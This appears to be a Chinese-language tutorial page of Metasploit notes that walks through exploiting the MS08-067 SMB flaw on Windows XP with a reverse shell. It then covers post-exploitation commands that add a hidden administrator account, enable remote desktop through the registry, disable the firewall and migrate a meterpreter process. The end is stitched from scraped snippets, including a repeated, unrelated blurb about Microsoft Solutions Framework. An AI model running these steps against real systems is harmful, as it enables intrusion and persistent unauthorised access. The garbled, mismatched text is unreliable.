msf 基本用法
msfconsole
help
nmap -sn 192.168.208.0/24 主機發現
滲透攻擊過程
需要xp使用者登入系統後才可以利用成功。
1.search ms08-067
2. use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
3. show payloads
4. set payload generic/shell_reverse_tcp
5. show targets
6. show options
7. set rhost 192.168.
208.166
8. set lhost 192.168.1.36
9. exploit
提權過程
>net user lilei 123456 /add --新增使用者
>net localgroup administrators lilei /add --將lilei新增到administrators使用者組
>netstat -na --檢視開放埠
>reg add hklm\system\currentcontrolset\control\terminal" "server /v fdenytsconnections /t reg_dword /d 00000000 /f --開啟遠端桌面3389埠
>netsh firewall set opmode disable --關閉防火牆
meterpreter p
s netstat -ano
|findstr 4444 可以查出
meterpreter
建立的host 程序。 比如為984 m
igrate 移到 explore.exe 程序後, 即使host 殺死984程序, host 中仍然可以通過
netstat -ano
|findstr 4444
看到 ,猜測此時的984 已經不是程序號而是執行緒號了。
跳板攻擊: 待續 p
ayload : 待續
MSF基本使用
鏈結資料庫 linux查詢檔案 find name dabase.yml 鏈結資料庫 db connect y path database.yml db status 查詢資料庫鏈結狀態 background 後台 sessions i 1 返回 sessions l 列出所有session get...
MSF基本原則概述
msf 即microsoft solution framework 也就是微軟公司推薦做軟體的方法。在 2006 年,伴隨著 visual studio team foundation 2005 的發布,msf4.0 也推出了。其中描述了團隊協作的典型流程和在軟體上的應用,軟體自然就是 vstf了。...
MSF基本原則概述
msf 即microsoft solution framework 也就是微軟公司推薦做軟體的方法。在 2006 年,伴隨著 visual studio team foundation 2005 的發布,msf4.0 也推出了。其中描述了團隊協作的典型流程和在軟體上的應用,軟體自然就是 vstf了。...